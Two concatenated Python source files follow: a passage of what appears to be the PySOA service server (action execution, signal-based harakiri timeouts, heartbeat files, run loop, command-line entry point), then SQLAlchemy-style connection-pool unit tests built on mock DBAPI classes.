# noinspection PyArgumentList
action_request = self.request_class(
action=simple_action_request.action,
body=simple_action_request.body,
switches=job_switches,
context=job_request.context,
control=job_request.control,
client=job_request.client,
run_coroutine=job_request.run_coroutine,
)
action_request._server = self
action_in_class_map = action_request.action in self.action_class_map
if action_in_class_map or action_request.action in ('status', 'introspect'):
# Get action to run
if action_in_class_map:
action = self.action_class_map[action_request.action](self.settings)
elif action_request.action == 'introspect':
# If set, use custom introspection action. Use default otherwise.
if self.introspection_action is not None:
action = self.introspection_action(self)
else:
from pysoa.server.action.introspection import IntrospectionAction
action = IntrospectionAction(server=self)
else:
if not self._default_status_action_class:
from pysoa.server.action.status import make_default_status_action_class
self._default_status_action_class = make_default_status_action_class(self.__class__)
# noinspection PyTypeChecker
action = self._default_status_action_class(self.settings)
# Wrap it in middleware
wrapper = self.make_middleware_stack(
[m.action for m in self._middleware],
action,
)
# Execute the middleware stack
try:
PySOALogContextFilter.set_logging_action_name(action_request.action)
action_response = wrapper(action_request)
except HarakiriInterrupt:
self.metrics.counter('server.error.harakiri', harakiri_level='action').increment()
action_response = ActionResponse(
action=action_request.action,
errors=[Error(
code=ERROR_CODE_ACTION_TIMEOUT,
message='The action "{}" ran for too long and had to be interrupted.'.format(
action_request.action,
),
is_caller_error=False,
)],
)
harakiri = True
except ActionError as e:
# An action error was thrown while running the action (or its middleware)
action_response = ActionResponse(
action=action_request.action,
errors=e.errors,
)
except JobError:
# It's unusual for an action or action middleware to raise a JobError, so when it happens it's
# usually for testing purposes or a really important reason, so we re-raise instead of handling
# like we handle all other exceptions below.
raise
except Exception as e:
# Send an action error response if no middleware caught this.
self.metrics.counter('server.error.unhandled_error').increment()
action_response = self.handle_unhandled_exception(e, ActionResponse, action=action_request.action)
finally:
PySOALogContextFilter.clear_logging_action_name()
else:
# Error: Action not found.
action_response = ActionResponse(
action=action_request.action,
errors=[Error(
code=ERROR_CODE_UNKNOWN,
message='The action "{}" was not found on this server.'.format(action_request.action),
field='action',
is_caller_error=True,
)],
)
job_response.actions.append(action_response)
if harakiri or (
action_response.errors and
not job_request.control.get('continue_on_error', False)
):
# Quit running Actions if harakiri occurred or an error occurred and continue_on_error is False
break
return job_response
def handle_shutdown_signal(self, signal_number, _stack_frame): # type: (int, FrameType) -> None
"""
Handles the reception of a shutdown signal.
"""
if not self._shutdown_lock.acquire(False):
# Ctrl+C can result in 2 or even more signals coming in within nanoseconds of each other. We lock to
# prevent handling them all. The duplicates can always be ignored, so this is a non-blocking acquire.
return
try:
if self.shutting_down:
if (
self._last_signal in (signal.SIGINT, signal.SIGTERM) and
self._last_signal != signal_number and
time.time() - self._last_signal_received < 1
):
self.logger.info('Ignoring duplicate shutdown signal received within one second of original signal')
else:
self.logger.warning('Received double interrupt, forcing shutdown')
sys.exit(1)
else:
self.logger.warning('Received interrupt, initiating shutdown')
self.shutting_down = True
self._last_signal = signal_number
self._last_signal_received = time.time()
finally:
self._shutdown_lock.release()
def harakiri(self, signal_number, _stack_frame): # type: (int, FrameType) -> None
"""
Handles the reception of a timeout signal indicating that a request has been processing for too long, as
defined by the harakiri settings. This method makes use of two "private" Python functions,
`sys._current_frames` and `os._exit`, but both of these functions are publicly documented and supported.
"""
if not self._shutdown_lock.acquire(False):
# Ctrl+C can result in 2 or even more signals coming in within nanoseconds of each other. We lock to
# prevent handling them all. The duplicates can always be ignored, so this is a non-blocking acquire.
return
threads = {
cast(int, t.ident): {'name': t.name, 'traceback': ['Unknown']}
for t in threading.enumerate()
} # type: Dict[int, Dict[six.text_type, Any]]
# noinspection PyProtectedMember
for thread_id, frame in sys._current_frames().items():
stack = []
for f in traceback.format_stack(frame):
stack.extend(f.rstrip().split('\n'))
if 'for f in traceback.format_stack(frame):' in stack[-1] and 'in harakiri' in stack[-2]:
# We don't need the stack data from this code right here at the end of the stack; it's just confusing.
stack = stack[:-2]
threads.setdefault(thread_id, {'name': thread_id})['traceback'] = stack
extra = {'data': {'thread_status': {
t['name']: [line.rstrip() for line in t['traceback']] for t in threads.values()
}}}
details = 'Current thread status at harakiri trigger:\n{}'.format('\n'.join((
'Thread {}:\n{}'.format(t['name'], '\n'.join(t['traceback'])) for t in threads.values()
)))
try:
self._last_signal = signal_number
self._last_signal_received = time.time()
if self.shutting_down:
self.logger.error(
'Graceful shutdown failed {} seconds after harakiri. Exiting now!'.format(
self.settings['harakiri']['shutdown_grace']
),
extra=extra,
)
self.logger.info(details)
try:
self.metrics.counter('server.error.harakiri', harakiri_level='emergency').increment()
self.metrics.publish_all()
finally:
# We tried shutting down gracefully, but it didn't work. This probably means that we are CPU bound
# in lower-level C code that can't be easily interrupted. Because of this, we forcefully terminate
# the server with prejudice. But first, we do our best to let things finish cleanly, if possible.
# noinspection PyProtectedMember
try:
exit_func = getattr(atexit, '_run_exitfuncs', None)
if exit_func:
thread = threading.Thread(target=exit_func)
thread.start()
thread.join(5.0) # don't let cleanup tasks take more than five seconds
else:
# we have no way to run exit functions, so at least give I/O two seconds to flush
time.sleep(2.0)
finally:
# noinspection PyProtectedMember
os._exit(1)
else:
self.logger.warning(
'No activity for {} seconds, triggering harakiri with grace period of {} seconds'.format(
self.settings['harakiri']['timeout'],
self.settings['harakiri']['shutdown_grace'],
),
extra=extra,
)
self.logger.info(details)
# We re-set the alarm so that if the graceful shutdown we're attempting here doesn't work, harakiri
# will be triggered again to force a non-graceful shutdown.
signal.alarm(self.settings['harakiri']['shutdown_grace'])
# Just setting the shutting_down flag isn't enough, because, if harakiri was triggered, we're probably
# CPU or I/O bound in some way that won't return any time soon. So we also raise HarakiriInterrupt to
# interrupt the main thread and cause the service to shut down in an orderly fashion.
self.shutting_down = True
raise HarakiriInterrupt()
finally:
self._shutdown_lock.release()
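# How this handler is armed (see run() below): SIGALRM is bound to self.harakiri
# and signal.alarm(self.settings['harakiri']['timeout']) is re-set at the top of
# each loop iteration, so this fires only when a single pass through
# handle_next_request() fails to come back around within the harakiri timeout.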
def setup(self): # type: () -> None
"""
Runs just before the server starts, if you need to do one-time loads or cache warming. Call super().setup() if
you override. See the documentation for `Server.main` for full details on the chain of `Server` method calls.
"""
def teardown(self): # type: () -> None
"""
Runs just before the server shuts down, if you need to do any kind of clean up (like updating a metrics gauge,
etc.). Call super().teardown() if you override. See the documentation for `Server.main` for full details on the
chain of `Server` method calls.
"""
def _close_old_django_connections(self): # type: () -> None
if self.use_django and not self._skip_django_database_cleanup:
django_close_old_database_connections()
def _close_django_caches(self, shutdown=False): # type: (bool) -> None
if self.use_django and django_caches:
if shutdown:
self.logger.info('Closing all Django caches')
for cache in django_caches.all():
cache.close(for_shutdown=shutdown)
def _create_heartbeat_file(self): # type: () -> None
if self.settings['heartbeat_file']:
heartbeat_file_path = self.settings['heartbeat_file'].replace('{{pid}}', six.text_type(os.getpid()))
if '{{fid}}' in heartbeat_file_path and self._forked_process_id is not None:
heartbeat_file_path = heartbeat_file_path.replace('{{fid}}', six.text_type(self._forked_process_id))
self.logger.info('Creating heartbeat file {}'.format(heartbeat_file_path))
file_path = os.path.abspath(heartbeat_file_path)
self._heartbeat_file_path = file_path
self._heartbeat_file = codecs.open(
filename=file_path,
mode='wb',
encoding='utf-8',
)
self._update_heartbeat_file()
def _delete_heartbeat_file(self): # type: () -> None
if self._heartbeat_file:
self.logger.info('Closing and removing heartbeat file')
# noinspection PyBroadException
try:
self._heartbeat_file.close()
except Exception:
self.logger.warning('Error while closing heartbeat file', exc_info=True)
finally:
# noinspection PyBroadException
try:
if self._heartbeat_file_path:
os.remove(self._heartbeat_file_path)
except Exception:
self.logger.warning('Error while removing heartbeat file', exc_info=True)
def _update_heartbeat_file(self): # type: () -> None
if self._heartbeat_file and time.time() - self._heartbeat_file_last_update > 2.5:
# Only update the heartbeat file if one is configured and it has been at least 2.5 seconds since the last
# update. This prevents us from dragging down service performance by constantly updating the file system.
self._heartbeat_file.seek(0)
self._heartbeat_file.write(six.text_type(time.time()))
self._heartbeat_file.flush()
self._heartbeat_file_last_update = time.time()
def perform_pre_request_actions(self): # type: () -> None
"""
Runs just before the server accepts a new request. Call super().perform_pre_request_actions() if you override.
Be sure your purpose for overriding isn't better met with middleware. See the documentation for `Server.main`
for full details on the chain of `Server` method calls.
"""
self.metrics.publish_all()
if self.use_django:
django_reset_database_queries()
self._close_old_django_connections()
def perform_post_request_actions(self): # type: () -> None
"""
Runs just after the server processes a request. Call super().perform_post_request_actions() if you override. Be
sure your purpose for overriding isn't better met with middleware. See the documentation for `Server.main` for
full details on the chain of `Server` method calls.
"""
self._close_old_django_connections()
self._close_django_caches()
self._update_heartbeat_file()
def perform_idle_actions(self): # type: () -> None
"""
Runs periodically when the server is idle, if it has been too long since it last received a request. Call
super().perform_idle_actions() if you override. See the documentation for `Server.main` for full details on the
chain of `Server` method calls.
"""
self._close_old_django_connections()
self._update_heartbeat_file()
def _set_busy_metrics(self, busy, running=True): # type: (bool, bool) -> None
self.metrics.gauge('server.worker.running').set(1 if running else 0)
self.metrics.gauge('server.worker.busy').set(1 if busy else 0)
def run(self): # type: () -> None
"""
Starts the server run loop and returns after the server shuts down due to a shutdown request, harakiri signal,
or unhandled exception. See the documentation for `Server.main` for full details on the chain of `Server`
method calls.
"""
self.logger.info(
'Service "{service}" server starting up, pysoa version {pysoa}, listening on transport {transport}.'.format(
service=self.service_name,
pysoa=pysoa.version.__version__,
transport=self.transport,
)
)
self.setup()
self.metrics.counter('server.worker.startup').increment()
self._set_busy_metrics(False)
self.metrics.publish_all()
if self._async_event_loop_thread:
self._async_event_loop_thread.start()
self._create_heartbeat_file()
signal.signal(signal.SIGINT, self.handle_shutdown_signal)
signal.signal(signal.SIGTERM, self.handle_shutdown_signal)
signal.signal(signal.SIGALRM, self.harakiri)
transient_failures = 0
# noinspection PyBroadException
try:
while not self.shutting_down:
# reset harakiri timeout
signal.alarm(self.settings['harakiri']['timeout'])
# Get, process, and execute the next JobRequest
try:
self.handle_next_request()
if transient_failures > 0:
transient_failures -= 1
except TransientPySOATransportError:
if transient_failures > 5:
self.logger.exception('Too many errors receiving message from transport; shutting down!')
break
# This sleeps using an exponential back-off period in the hopes that the problem will recover
sleep = (2 ** transient_failures + random.random()) / 4.0
self.logger.info(
'Transient error receiving message from transport, sleeping {} seconds and continuing.'.format(
sleep,
),
)
time.sleep(sleep)
transient_failures += 1
finally:
self.metrics.publish_all()
except HarakiriInterrupt:
self.metrics.counter('server.error.harakiri', harakiri_level='server').increment()
self.logger.error('Harakiri interrupt occurred outside of action or job handling')
except Exception:
self.metrics.counter('server.error.unknown').increment()
self.logger.exception('Unhandled server error; shutting down')
finally:
self.teardown()
self.metrics.counter('server.worker.shutdown').increment()
self._set_busy_metrics(False, False)
self.metrics.publish_all()
self.logger.info('Server shutting down')
if self._async_event_loop_thread:
self._async_event_loop_thread.join()
self._close_django_caches(shutdown=True)
self._delete_heartbeat_file()
self.logger.info('Server shutdown complete')
@classmethod
def pre_fork(cls): # type: () -> None
"""
Called only if the --fork argument is used to pre-fork multiple worker processes. In this case, it is called
by the parent process immediately after signal handlers are set and immediately before the worker sub-processes
are spawned. It is never called again in the life span of the parent process, even if a worker process crashes
and gets re-spawned.
"""
# noinspection PyUnusedLocal
@classmethod
def initialize(cls, settings): # type: (ServerSettings) -> Type[Server]
"""
Called just before the `Server` class is instantiated, and passed the settings dict. Can be used to perform
settings manipulation, server class patching (such as for performance tracing operations), and more. Use with
great care and caution. Overriding methods must call `super` and return `cls` or a new/modified `cls`, which
will be used to instantiate the server. See the documentation for `Server.main` for full details on the chain
of `Server` method calls.
:return: The server class or a new/modified server class
"""
return cls
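# A minimal, hedged sketch of honoring the initialize contract (call super and
# return the class); any patching shown here would be service-specific:
#
#     class MyServiceServer(Server):
#         @classmethod
#         def initialize(cls, settings):
#             new_cls = super(MyServiceServer, cls).initialize(settings)
#             # e.g. wrap new_cls methods for tracing here (illustrative)
#             return new_cls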
@classmethod
def main(cls, forked_process_id=None): # type: (Optional[int]) -> None
"""
Command-line entry point for running a PySOA server. The chain of method calls is as follows::
cls.main
|
-> cls.initialize => new_cls
-> new_cls.__init__ => self
-> self.run
|
-> self.setup
-> [async event loop started if Python 3.5+]
-> [heartbeat file created if configured]
-> loop: self.handle_next_request while not self.shutting_down
|
-> transport.receive_request_message
-> self.perform_idle_actions (if no request)
-> self.perform_pre_request_actions
-> self.process_job
|
-> middleware(self.execute_job)
-> transport.send_response_message
-> self.perform_post_request_actions
-> self.teardown
-> [async event loop joined in Python 3.5+; this may take a few seconds to finish running tasks]
-> [Django resources cleaned up]
-> [heartbeat file deleted if configured]
:param forked_process_id: If multiple processes are forked by the same parent process, this will be set to a
unique, deterministic (incremental) ID which can be used in logging, the heartbeat
file, etc. For example, if the `--fork` argument is used with the value 5 (creating
five child processes), this argument will have the values 1, 2, 3, 4, and 5 across
the five respective child processes.
"""
parser = argparse.ArgumentParser(
description='Server for the {} SOA service'.format(cls.service_name),
)
parser.add_argument(
'-d', '--daemon',
action='store_true',
help='run the server process as a daemon',
)
if not cls.use_django:
# If Django mode is turned on, we use the Django settings framework to get our settings, so the caller
# needs to set DJANGO_SETTINGS_MODULE. Otherwise, the caller must pass in the -s/--settings argument.
parser.add_argument(
'-s', '--settings',
help='The settings module to use',
required=True,
)
cmd_options, _ = parser.parse_known_args(sys.argv[1:])
# Load settings from the given file (or use Django and grab from its settings)
if cls.use_django:
# noinspection PyUnresolvedReferences
if not django_settings:
raise ImportError(
'Could not import Django. You must install Django if you enable Django support in your service.'
)
try:
settings = cls.settings_class(django_settings.SOA_SERVER_SETTINGS)
except AttributeError:
raise ValueError('Cannot find `SOA_SERVER_SETTINGS` in the Django settings.')
else:
try:
settings_module = importlib.import_module(cmd_options.settings)
except ImportError as e:
raise ValueError('Cannot import settings module `%s`: %s' % (cmd_options.settings, e))
try:
settings_dict = getattr(settings_module, 'SOA_SERVER_SETTINGS')
except AttributeError:
try:
settings_dict = getattr(settings_module, 'settings')
except AttributeError:
raise ValueError(
"Cannot find `SOA_SERVER_SETTINGS` or `settings` variable in settings module `{}`.".format(
cmd_options.settings,
)
)
settings = cls.settings_class(settings_dict)
if not cls.service_name:
raise AttributeError('Server subclass must set service_name')
PySOALogContextFilter.set_service_name(cls.service_name)
# Set up logging
logging.config.dictConfig(settings['logging'])
# Optionally daemonize
if cmd_options.daemon:
pid = os.fork()
if pid > 0:
print('PID={}'.format(pid))
sys.exit()
# Set up server and signal handling
server = cls.initialize(settings)(settings, forked_process_id) # type: Server
# Start server event loop
server.run()
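# A minimal, hedged sketch of a concrete service built on this module (the
# action class and its module are hypothetical, not part of this file):
#
#     class ExampleServer(Server):
#         service_name = 'example'
#         action_class_map = {'square': SquareAction}  # SquareAction is hypothetical
#
#     if __name__ == '__main__':
#         ExampleServer.main()  # parses -s/--settings (or uses Django settings) and runs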
|
test_pool.py
|
import threading
import time
from sqlalchemy import pool, select, event
import sqlalchemy as tsa
from sqlalchemy import testing
from sqlalchemy.testing.util import gc_collect, lazy_gc
from sqlalchemy.testing import eq_, assert_raises
from sqlalchemy.testing.engines import testing_engine
from sqlalchemy.testing import fixtures
mcid = 1
class MockDBAPI(object):
throw_error = False
def connect(self, *args, **kwargs):
if self.throw_error:
raise Exception("couldnt connect !")
delay = kwargs.pop('delay', 0)
if delay:
time.sleep(delay)
return MockConnection()
class MockConnection(object):
closed = False
def __init__(self):
global mcid
self.id = mcid
mcid += 1
def close(self):
self.closed = True
def rollback(self):
pass
def cursor(self):
return MockCursor()
class MockCursor(object):
def execute(self, *args, **kw):
pass
def close(self):
pass
class PoolTestBase(fixtures.TestBase):
def setup(self):
pool.clear_managers()
@classmethod
def teardown_class(cls):
pool.clear_managers()
def _queuepool_fixture(self, **kw):
dbapi, pool = self._queuepool_dbapi_fixture(**kw)
return pool
def _queuepool_dbapi_fixture(self, **kw):
dbapi = MockDBAPI()
return dbapi, pool.QueuePool(creator=lambda: dbapi.connect('foo.db'),
**kw)
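# The fixtures above are the pattern used throughout these tests: a QueuePool
# whose creator closes over a MockDBAPI. A hedged standalone sketch:
#
#     dbapi = MockDBAPI()
#     p = pool.QueuePool(creator=lambda: dbapi.connect('foo.db'), pool_size=3, max_overflow=1)
#     conn = p.connect()   # checks a MockConnection out of the pool
#     conn.close()         # returns it to the pool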
class PoolTest(PoolTestBase):
def test_manager(self):
manager = pool.manage(MockDBAPI(), use_threadlocal=True)
c1 = manager.connect('foo.db')
c2 = manager.connect('foo.db')
c3 = manager.connect('bar.db')
c4 = manager.connect("foo.db", bar="bat")
c5 = manager.connect("foo.db", bar="hoho")
c6 = manager.connect("foo.db", bar="bat")
assert c1.cursor() is not None
assert c1 is c2
assert c1 is not c3
assert c4 is c6
assert c4 is not c5
def test_manager_with_key(self):
class NoKws(object):
def connect(self, arg):
return MockConnection()
manager = pool.manage(NoKws(), use_threadlocal=True)
c1 = manager.connect('foo.db', sa_pool_key="a")
c2 = manager.connect('foo.db', sa_pool_key="b")
c3 = manager.connect('bar.db', sa_pool_key="a")
assert c1.cursor() is not None
assert c1 is not c2
assert c1 is c3
def test_bad_args(self):
manager = pool.manage(MockDBAPI())
manager.connect(None)
def test_non_thread_local_manager(self):
manager = pool.manage(MockDBAPI(), use_threadlocal=False)
connection = manager.connect('foo.db')
connection2 = manager.connect('foo.db')
self.assert_(connection.cursor() is not None)
self.assert_(connection is not connection2)
@testing.fails_on('+pyodbc',
"pyodbc cursor doesn't implement tuple __eq__")
def test_cursor_iterable(self):
conn = testing.db.raw_connection()
cursor = conn.cursor()
cursor.execute(str(select([1], bind=testing.db)))
expected = [(1, )]
for row in cursor:
eq_(row, expected.pop(0))
def test_no_connect_on_recreate(self):
def creator():
raise Exception("no creates allowed")
for cls in (pool.SingletonThreadPool, pool.StaticPool,
pool.QueuePool, pool.NullPool, pool.AssertionPool):
p = cls(creator=creator)
p.dispose()
p2 = p.recreate()
assert p2.__class__ is cls
mock_dbapi = MockDBAPI()
p = cls(creator=mock_dbapi.connect)
conn = p.connect()
conn.close()
mock_dbapi.throw_error = True
p.dispose()
p.recreate()
def testthreadlocal_del(self):
self._do_testthreadlocal(useclose=False)
def testthreadlocal_close(self):
self._do_testthreadlocal(useclose=True)
def _do_testthreadlocal(self, useclose=False):
dbapi = MockDBAPI()
for p in pool.QueuePool(creator=dbapi.connect,
pool_size=3, max_overflow=-1,
use_threadlocal=True), \
pool.SingletonThreadPool(creator=dbapi.connect,
use_threadlocal=True):
c1 = p.connect()
c2 = p.connect()
self.assert_(c1 is c2)
c3 = p.unique_connection()
self.assert_(c3 is not c1)
if useclose:
c2.close()
else:
c2 = None
c2 = p.connect()
self.assert_(c1 is c2)
self.assert_(c3 is not c1)
if useclose:
c2.close()
else:
c2 = None
lazy_gc()
if useclose:
c1 = p.connect()
c2 = p.connect()
c3 = p.connect()
c3.close()
c2.close()
self.assert_(c1.connection is not None)
c1.close()
c1 = c2 = c3 = None
# extra tests with QueuePool to ensure connections get
# __del__()ed when dereferenced
if isinstance(p, pool.QueuePool):
lazy_gc()
self.assert_(p.checkedout() == 0)
c1 = p.connect()
c2 = p.connect()
if useclose:
c2.close()
c1.close()
else:
c2 = None
c1 = None
lazy_gc()
self.assert_(p.checkedout() == 0)
def test_info(self):
p = self._queuepool_fixture(pool_size=1, max_overflow=0)
c = p.connect()
self.assert_(not c.info)
self.assert_(c.info is c._connection_record.info)
c.info['foo'] = 'bar'
c.close()
del c
c = p.connect()
self.assert_('foo' in c.info)
c.invalidate()
c = p.connect()
self.assert_('foo' not in c.info)
c.info['foo2'] = 'bar2'
c.detach()
self.assert_('foo2' in c.info)
c2 = p.connect()
self.assert_(c.connection is not c2.connection)
self.assert_(not c2.info)
self.assert_('foo2' in c.info)
class PoolDialectTest(PoolTestBase):
def _dialect(self):
canary = []
class PoolDialect(object):
def do_rollback(self, dbapi_connection):
canary.append('R')
dbapi_connection.rollback()
def do_commit(self, dbapi_connection):
canary.append('C')
dbapi_connection.commit()
def do_close(self, dbapi_connection):
canary.append('CL')
dbapi_connection.close()
return PoolDialect(), canary
def _do_test(self, pool_cls, assertion):
mock_dbapi = MockDBAPI()
dialect, canary = self._dialect()
p = pool_cls(creator=mock_dbapi.connect)
p._dialect = dialect
conn = p.connect()
conn.close()
p.dispose()
p.recreate()
conn = p.connect()
conn.close()
eq_(canary, assertion)
def test_queue_pool(self):
self._do_test(pool.QueuePool, ['R', 'CL', 'R'])
def test_assertion_pool(self):
self._do_test(pool.AssertionPool, ['R', 'CL', 'R'])
def test_singleton_pool(self):
self._do_test(pool.SingletonThreadPool, ['R', 'CL', 'R'])
def test_null_pool(self):
self._do_test(pool.NullPool, ['R', 'CL', 'R', 'CL'])
def test_static_pool(self):
self._do_test(pool.StaticPool, ['R', 'R'])
class PoolEventsTest(PoolTestBase):
def _first_connect_event_fixture(self):
p = self._queuepool_fixture()
canary = []
def first_connect(*arg, **kw):
canary.append('first_connect')
event.listen(p, 'first_connect', first_connect)
return p, canary
def _connect_event_fixture(self):
p = self._queuepool_fixture()
canary = []
def connect(*arg, **kw):
canary.append('connect')
event.listen(p, 'connect', connect)
return p, canary
def _checkout_event_fixture(self):
p = self._queuepool_fixture()
canary = []
def checkout(*arg, **kw):
canary.append('checkout')
event.listen(p, 'checkout', checkout)
return p, canary
def _checkin_event_fixture(self):
p = self._queuepool_fixture()
canary = []
def checkin(*arg, **kw):
canary.append('checkin')
event.listen(p, 'checkin', checkin)
return p, canary
def _reset_event_fixture(self):
p = self._queuepool_fixture()
canary = []
def reset(*arg, **kw):
canary.append('reset')
event.listen(p, 'reset', reset)
return p, canary
def test_first_connect_event(self):
p, canary = self._first_connect_event_fixture()
c1 = p.connect()
eq_(canary, ['first_connect'])
def test_first_connect_event_fires_once(self):
p, canary = self._first_connect_event_fixture()
c1 = p.connect()
c2 = p.connect()
eq_(canary, ['first_connect'])
def test_first_connect_on_previously_recreated(self):
p, canary = self._first_connect_event_fixture()
p2 = p.recreate()
c1 = p.connect()
c2 = p2.connect()
eq_(canary, ['first_connect', 'first_connect'])
def test_first_connect_on_subsequently_recreated(self):
p, canary = self._first_connect_event_fixture()
c1 = p.connect()
p2 = p.recreate()
c2 = p2.connect()
eq_(canary, ['first_connect', 'first_connect'])
def test_connect_event(self):
p, canary = self._connect_event_fixture()
c1 = p.connect()
eq_(canary, ['connect'])
def test_connect_event_fires_subsequent(self):
p, canary = self._connect_event_fixture()
c1 = p.connect()
c2 = p.connect()
eq_(canary, ['connect', 'connect'])
def test_connect_on_previously_recreated(self):
p, canary = self._connect_event_fixture()
p2 = p.recreate()
c1 = p.connect()
c2 = p2.connect()
eq_(canary, ['connect', 'connect'])
def test_connect_on_subsequently_recreated(self):
p, canary = self._connect_event_fixture()
c1 = p.connect()
p2 = p.recreate()
c2 = p2.connect()
eq_(canary, ['connect', 'connect'])
def test_checkout_event(self):
p, canary = self._checkout_event_fixture()
c1 = p.connect()
eq_(canary, ['checkout'])
def test_checkout_event_fires_subsequent(self):
p, canary = self._checkout_event_fixture()
c1 = p.connect()
c2 = p.connect()
eq_(canary, ['checkout', 'checkout'])
def test_checkout_event_on_subsequently_recreated(self):
p, canary = self._checkout_event_fixture()
c1 = p.connect()
p2 = p.recreate()
c2 = p2.connect()
eq_(canary, ['checkout', 'checkout'])
def test_checkin_event(self):
p, canary = self._checkin_event_fixture()
c1 = p.connect()
eq_(canary, [])
c1.close()
eq_(canary, ['checkin'])
def test_reset_event(self):
p, canary = self._reset_event_fixture()
c1 = p.connect()
eq_(canary, [])
c1.close()
eq_(canary, ['reset'])
def test_checkin_event_gc(self):
p, canary = self._checkin_event_fixture()
c1 = p.connect()
eq_(canary, [])
del c1
lazy_gc()
eq_(canary, ['checkin'])
def test_checkin_event_on_subsequently_recreated(self):
p, canary = self._checkin_event_fixture()
c1 = p.connect()
p2 = p.recreate()
c2 = p2.connect()
eq_(canary, [])
c1.close()
eq_(canary, ['checkin'])
c2.close()
eq_(canary, ['checkin', 'checkin'])
def test_listen_targets_scope(self):
canary = []
def listen_one(*args):
canary.append("listen_one")
def listen_two(*args):
canary.append("listen_two")
def listen_three(*args):
canary.append("listen_three")
def listen_four(*args):
canary.append("listen_four")
engine = testing_engine(testing.db.url)
event.listen(pool.Pool, 'connect', listen_one)
event.listen(engine.pool, 'connect', listen_two)
event.listen(engine, 'connect', listen_three)
event.listen(engine.__class__, 'connect', listen_four)
engine.execute(select([1])).close()
eq_(
canary,
["listen_one", "listen_four", "listen_two", "listen_three"]
)
def test_listen_targets_per_subclass(self):
"""test that listen() called on a subclass remains specific to that subclass."""
canary = []
def listen_one(*args):
canary.append("listen_one")
def listen_two(*args):
canary.append("listen_two")
def listen_three(*args):
canary.append("listen_three")
event.listen(pool.Pool, 'connect', listen_one)
event.listen(pool.QueuePool, 'connect', listen_two)
event.listen(pool.SingletonThreadPool, 'connect', listen_three)
p1 = pool.QueuePool(creator=MockDBAPI().connect)
p2 = pool.SingletonThreadPool(creator=MockDBAPI().connect)
assert listen_one in p1.dispatch.connect
assert listen_two in p1.dispatch.connect
assert listen_three not in p1.dispatch.connect
assert listen_one in p2.dispatch.connect
assert listen_two not in p2.dispatch.connect
assert listen_three in p2.dispatch.connect
p1.connect()
eq_(canary, ["listen_one", "listen_two"])
p2.connect()
eq_(canary, ["listen_one", "listen_two", "listen_one", "listen_three"])
def teardown(self):
# TODO: need to get remove() functionality
# going
pool.Pool.dispatch._clear()
class DeprecatedPoolListenerTest(PoolTestBase):
@testing.requires.predictable_gc
@testing.uses_deprecated(r".*Use event.listen")
def test_listeners(self):
class InstrumentingListener(object):
def __init__(self):
if hasattr(self, 'connect'):
self.connect = self.inst_connect
if hasattr(self, 'first_connect'):
self.first_connect = self.inst_first_connect
if hasattr(self, 'checkout'):
self.checkout = self.inst_checkout
if hasattr(self, 'checkin'):
self.checkin = self.inst_checkin
self.clear()
def clear(self):
self.connected = []
self.first_connected = []
self.checked_out = []
self.checked_in = []
def assert_total(innerself, conn, fconn, cout, cin):
eq_(len(innerself.connected), conn)
eq_(len(innerself.first_connected), fconn)
eq_(len(innerself.checked_out), cout)
eq_(len(innerself.checked_in), cin)
def assert_in(innerself, item, in_conn, in_fconn,
in_cout, in_cin):
self.assert_((item in innerself.connected) == in_conn)
self.assert_((item in innerself.first_connected) == in_fconn)
self.assert_((item in innerself.checked_out) == in_cout)
self.assert_((item in innerself.checked_in) == in_cin)
def inst_connect(self, con, record):
print("connect(%s, %s)" % (con, record))
assert con is not None
assert record is not None
self.connected.append(con)
def inst_first_connect(self, con, record):
print("first_connect(%s, %s)" % (con, record))
assert con is not None
assert record is not None
self.first_connected.append(con)
def inst_checkout(self, con, record, proxy):
print("checkout(%s, %s, %s)" % (con, record, proxy))
assert con is not None
assert record is not None
assert proxy is not None
self.checked_out.append(con)
def inst_checkin(self, con, record):
print("checkin(%s, %s)" % (con, record))
# con can be None if invalidated
assert record is not None
self.checked_in.append(con)
class ListenAll(tsa.interfaces.PoolListener, InstrumentingListener):
pass
class ListenConnect(InstrumentingListener):
def connect(self, con, record):
pass
class ListenFirstConnect(InstrumentingListener):
def first_connect(self, con, record):
pass
class ListenCheckOut(InstrumentingListener):
def checkout(self, con, record, proxy, num):
pass
class ListenCheckIn(InstrumentingListener):
def checkin(self, con, record):
pass
def assert_listeners(p, total, conn, fconn, cout, cin):
for instance in (p, p.recreate()):
self.assert_(len(instance.dispatch.connect) == conn)
self.assert_(len(instance.dispatch.first_connect) == fconn)
self.assert_(len(instance.dispatch.checkout) == cout)
self.assert_(len(instance.dispatch.checkin) == cin)
p = self._queuepool_fixture()
assert_listeners(p, 0, 0, 0, 0, 0)
p.add_listener(ListenAll())
assert_listeners(p, 1, 1, 1, 1, 1)
p.add_listener(ListenConnect())
assert_listeners(p, 2, 2, 1, 1, 1)
p.add_listener(ListenFirstConnect())
assert_listeners(p, 3, 2, 2, 1, 1)
p.add_listener(ListenCheckOut())
assert_listeners(p, 4, 2, 2, 2, 1)
p.add_listener(ListenCheckIn())
assert_listeners(p, 5, 2, 2, 2, 2)
del p
snoop = ListenAll()
p = self._queuepool_fixture(listeners=[snoop])
assert_listeners(p, 1, 1, 1, 1, 1)
c = p.connect()
snoop.assert_total(1, 1, 1, 0)
cc = c.connection
snoop.assert_in(cc, True, True, True, False)
c.close()
snoop.assert_in(cc, True, True, True, True)
del c, cc
snoop.clear()
# this one depends on immediate gc
c = p.connect()
cc = c.connection
snoop.assert_in(cc, False, False, True, False)
snoop.assert_total(0, 0, 1, 0)
del c, cc
lazy_gc()
snoop.assert_total(0, 0, 1, 1)
p.dispose()
snoop.clear()
c = p.connect()
c.close()
c = p.connect()
snoop.assert_total(1, 0, 2, 1)
c.close()
snoop.assert_total(1, 0, 2, 2)
# invalidation
p.dispose()
snoop.clear()
c = p.connect()
snoop.assert_total(1, 0, 1, 0)
c.invalidate()
snoop.assert_total(1, 0, 1, 1)
c.close()
snoop.assert_total(1, 0, 1, 1)
del c
lazy_gc()
snoop.assert_total(1, 0, 1, 1)
c = p.connect()
snoop.assert_total(2, 0, 2, 1)
c.close()
del c
lazy_gc()
snoop.assert_total(2, 0, 2, 2)
# detached
p.dispose()
snoop.clear()
c = p.connect()
snoop.assert_total(1, 0, 1, 0)
c.detach()
snoop.assert_total(1, 0, 1, 0)
c.close()
del c
snoop.assert_total(1, 0, 1, 0)
c = p.connect()
snoop.assert_total(2, 0, 2, 0)
c.close()
del c
snoop.assert_total(2, 0, 2, 1)
# recreated
p = p.recreate()
snoop.clear()
c = p.connect()
snoop.assert_total(1, 1, 1, 0)
c.close()
snoop.assert_total(1, 1, 1, 1)
c = p.connect()
snoop.assert_total(1, 1, 2, 1)
c.close()
snoop.assert_total(1, 1, 2, 2)
